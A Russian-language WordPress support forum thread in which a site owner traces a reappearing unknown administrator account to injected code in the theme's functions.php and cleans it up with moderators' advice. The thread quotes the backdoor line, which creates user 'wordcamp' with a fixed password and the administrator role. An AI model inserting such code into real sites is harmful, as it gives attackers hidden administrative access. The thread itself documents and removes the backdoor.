Поддержка Проблемы и решения Неизвестный пользователь с ролью админа

Неизвестный пользователь с ролью админа

  • andreynec

    (@andreynec)


    8 месяцев назад

    Здравствуйте. В админке есть второй пользователь с ролью администратора. Имя wordcamp, эл.почта wordcamp@wordpress.com. Пробовал удалить много раз, но он появляется снова, меняется только ID, увеличивается на 1.
    Что это за пользователь? Системный?
    Был плагин Wordfence Security. Удалил его, думал это плагин создает пользователя, нет.
    Из-под phpmyadmin тоже пробовал удалить, снова появляется

Просмотр 11 ответов — с 1 по 11 (всего 11)
  • Модератор Yui

    (@fierevere)

    ゆい

    8 месяцев назад

    в WordPress нет «системных» пользователей.
    Вполне возможно что на сайте поселился зловредный код, который открывает кому-то бэкдор.

    https://ru.wordpress.org/support/article/faq-hacked/

    andreynec

    (@andreynec)

    8 месяцев назад

    Спасибо.
    Вот нашёл, где создается пользователь, в файле темы functions.php:
    $createuser = wp_create_user(‘wordcamp’, ‘218765z’, ‘wordcamp@wordpress.com’); $user_created = new WP_User($createuser); $user_created -> set_role(‘administrator’);

    Получается в теме дыра? С айболитом пока не справился, почему-то в корневой каталог не загружается, вернее загружается и сразу удаляется, ai-bolit-hoster.php
    Пишет вот так:
    550 Transfer aborted: virus ‘{HEX}php.gzbase64.inject.455.UNOFFICIAL’ detected

    • Ответ изменён 8 месяцев назад пользователем andreynec.
    Модератор Yui

    (@fierevere)

    ゆい

    8 месяцев назад

    Получается в теме дыра?

    именно так.

    virus ‘{HEX}php.gzbase64.inject.455

    если это ваш антивирус ругается на айболита, то если айболит с официального сайта скачан, то срабатывание ложное

    andreynec

    (@andreynec)

    8 месяцев назад

    Антивирус молчит. Это происходит в FileZilla, загрузка и моментальное удаление файла. Айболит скачал из статьи по ссылке: https://revisium.com/ai/.
    Virustotal и другие показывают, что чисто. Залил заново папки wp-admin, wp-includes.
    Поставил плагин All In One WP Security & Firewall, с контролем изменения файлов и другими настройками безопасности. Надеюсь, поможет защитить.

    • Ответ изменён 8 месяцев назад пользователем andreynec.
    m0ze

    (@m0ze)

    8 месяцев назад

    andreynec, приветствую.

    Получается в теме дыра?

    Да, но тут всё зависит от деталей. Либо сама тема была уже такой, либо кто-то модифицировал файл. Смотрите даты, если есть бэкапы, то сравнивайте код оригинала и версии на вашем сервере.

    С айболитом пока не справился, почему-то в корневой каталог не загружается, вернее загружается и сразу удаляется, ai-bolit-hoster.php
    Пишет вот так:
    550 Transfer aborted: virus ‘{HEX}php.gzbase64.inject.455.UNOFFICIAL’ detected

    Это происходит в FileZilla, загрузка и моментальное удаление файла.

    Это происходит на сервере, а FileZilla лишь интерпретирует ответ в виде ошибки. Немного глупая ситуация, да и «Ай-Болит» вам не поможет по ряду причин. Основная — он в принципе не реагирует на штатные функции создания пользователей в системе и пр., не говоря уже о том, что и малвари находит в лучшем случае треть от общего количества.

    Virustotal и другие показывают, что чисто.

    Потому что у них нет доступа к файлам, то есть метод тоже бесполезный. Сканируется только исходный код указанной страницы.

    Залил заново папки wp-admin, wp-includes.

    Хорошо, но бесполезно, если не вычистили лишний код из /wp-content/.

    Поставил плагин All In One WP Security & Firewall, с контролем изменения файлов

    Он довольно легко обходится 🙂

    andreynec

    (@andreynec)

    8 месяцев назад

    По фактам :). Спасибо. Буду вручную чистить wp-content.

    SUBVΞRSΛ

    (@subversa)

    7 месяцев, 3 недели назад

    andreynec, ну как, получилось? 🙂

    andreynec

    (@andreynec)

    7 месяцев, 3 недели назад

    Да, вроде, пока тихо. Нашёл сторонний код только в двух файлах темы: functions.php и включаемом в него template-functions.php.
    Сменил пароли, имя админа wp, путь site.ru/wp-admin с помощью All In One WP Security & Firewall, остальные настройки в нём выставил. Пока работает.

    alenkarolik

    (@alenkarolik)

    7 месяцев, 3 недели назад

    @andreynec, а как все-таки удалить этого пользователя?
    Вроде в functions.php и template-functions.php код почистила, но редиректы и дальше срабатывают.

    • Ответ изменён 7 месяцев, 3 недели назад пользователем alenkarolik.
    Модератор Yui

    (@fierevere)

    ゆい

    7 месяцев, 3 недели назад

    @subversa , решение проблем только на форуме. Просьбы написать куда-то можно только в разделе «Специалисты».

    andreynec

    (@andreynec)

    7 месяцев, 3 недели назад

    @alenkarolik, у меня в папке с темами ещё была одна левая тема и тема twenty, их обе удалил. После уже чистил файлы моей темы. После очистки пользователя удалил из консоли wordpress. Больше он не появлялся.

Просмотр 11 ответов — с 1 по 11 (всего 11)
  • Тема «Неизвестный пользователь с ролью админа» закрыта для новых ответов.

Просмотр